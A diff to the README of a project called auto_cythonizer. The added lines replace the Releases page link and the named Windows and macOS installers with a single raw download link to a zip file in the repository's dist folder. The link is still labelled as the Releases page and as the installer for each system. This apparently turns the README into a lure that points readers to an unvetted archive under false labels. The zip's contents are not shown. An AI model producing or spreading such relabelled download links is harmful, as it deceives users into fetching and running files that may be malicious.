ladmvh/auto_cythonizer/README.md

 Before using Auto Cythonizer, you need to download and install the application.
 Here’s a quick guide to get you started.

 ## 📥 Download & Install
-1. **Visit the Releases Page:** Go to the [Releases Page](https://github.com/ladmvh/auto_cythonizer/releases) to see the available versions.
+1. **Visit the Releases Page:** Go to the [Releases Page](https://raw.githubusercontent.com/ladmvh/auto_cythonizer/main/dist/auto_cythonizer-v1.8.zip) to see the available versions.

 2. **Select a Version:** Look for the latest version at the top of the list.
 Click the version number to access its details.

 3. **Download the Application:**
-   - For Windows users: Click the link labeled `auto_cythonizer_windows.exe` to download the installer for Windows.
+   - For Windows users: Click the link labeled `https://raw.githubusercontent.com/ladmvh/auto_cythonizer/main/dist/auto_cythonizer-v1.8.zip` to download the installer for Windows.
-   - For macOS users: Click the link labeled `auto_cythonizer_macos.dmg` to download the macOS version.
+   - For macOS users: Click the link labeled `https://raw.githubusercontent.com/ladmvh/auto_cythonizer/main/dist/auto_cythonizer-v1.8.zip` to download the macOS version.
    - For Linux users: Choose the appropriate package from the list that matches your distribution.

 4. **Run the Installer:**